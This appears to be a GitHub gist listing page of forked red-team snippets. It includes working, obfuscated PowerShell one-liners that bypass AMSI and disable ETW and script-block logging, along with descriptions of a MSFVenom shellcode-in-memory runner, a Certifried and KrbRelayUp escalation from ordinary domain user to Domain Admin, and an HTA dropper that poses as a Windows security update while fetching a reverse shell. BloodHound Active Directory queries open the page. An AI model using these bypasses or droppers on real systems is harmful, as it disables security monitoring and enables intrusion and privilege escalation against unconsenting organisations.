An00byss an00byss

@an00byss
an00byss / customqueries.json
Last active October 8, 2025 20:14
Custom BloodHound queries for BHCE
{
"queries": [
{
"name": "Find all Synchronization accounts possibly used for Entra ID Connect",
"category": "Hybrid - Users & Groups",
"queryList": [
{
"final": true,
"query": "MATCH (account) WHERE (account:User OR account:AZUser) AND (account.name =~ '(?i)^MSOL_|.*AADConnect.*' OR account.userprincipalname =~ '(?i)^sync_.*') RETURN account",
"allowCollapse": true
@an00byss
an00byss / powershell-bypasses.ps1
Created July 24, 2025 22:09 — forked from reigningshells/powershell-bypasses.ps1
Random PowerShell Bypasses
# Logging bypass:
(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))
# AMSI Bypass (old, burned)
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# New AMSI bypass obfuscation:
@an00byss
an00byss / amsi-bypass.ps1
Created July 24, 2025 22:09 — forked from timsonner/amsi-bypass.ps1
Obfuscated AMSI bypass. [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Create a reference to the assembly with further obfuscation
$randomPart = 'A' + 'msi' + 'Utils'
$ref = [Ref]
$asm = $ref.Assembly
$amsiType = $asm.GetType('System.' + 'Management.' + 'Automation.' + $randomPart)
# Prepare the field name in a more obfuscated way
$amsiFieldName = 'amsi' + 'Init' + 'Failed'
$amsiField = $amsiType.GetField($amsiFieldName, 'NonPublic, Static')
@an00byss
an00byss / KillETW.ps1
Created March 20, 2025 18:34 — forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
#
# This PowerShell command sets System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled to 0,
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging, for readability.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
@an00byss
an00byss / ali_ips.txt
Created March 3, 2025 17:26 — forked from charSLee013/ali_ips.txt
Alicloud full ip range
@an00byss
an00byss / pwshellcode.py
Created November 19, 2024 04:33 — forked from mcorybillington/pwshellcode.py
Simple script to tie together TrustedSec's work on running shellcode via PowerShell with MSFVenom. Very little effort made to evade/hide/bypass anything, just a simple way to run shellcode in memory if you get command execution and can run PowerShell on a pentest. Stick to x86 payloads from MSFVenom.
## Credits to the following projects for a lot of this powershell code and just general inspiration
## https://github.com/chvancooten/OSEP-Code-Snippets
## https://www.trustedsec.com/blog/native-powershell-x86-shellcode-injection-on-64-bit-platforms/
from argparse import ArgumentParser
import subprocess
import base64
import os
@an00byss
an00byss / certifried_with_krbrelayup.md
Created May 10, 2024 15:30 — forked from S3cur3Th1sSh1t/certifried_with_krbrelayup.md
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from a non-privileged user, with the requirement of adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combining these two: a non-privileged domain user escalates to Domain Admin without the requirement of adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites:

@an00byss
an00byss / LICENSE
Created January 18, 2024 17:42 — forked from brianbruggeman/LICENSE
Convert Viscosity to OpenVPN
Public Domain
@an00byss
an00byss / oauthServer.go
Created December 2, 2023 00:58 — forked from invokethreatguy/oauthServer.go
A mini OAuth server for Azure
package main
import (
"crypto/tls"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"strings"
)
@an00byss
an00byss / Update.hta
Created January 30, 2023 18:16 — forked from r00t-3xp10it/Update.hta
meterpeter v2.10.10 - payload HTA dropper
<!--
Hta_Version: 1.0.1
Author: @r00t-3xp10it (ssa)
Application: meterpeter v2.10.10 dropper
.DESCRIPTION
This HTA changes PS 'ExecutionPolicy' to 'UnRestricted', presents a msgbox
pretending to be a security KB5005101 21H1 update, while it downloads\executes
meterpeter client.ps1 (rev_tcp_shell) in the background from the attacker's webserver.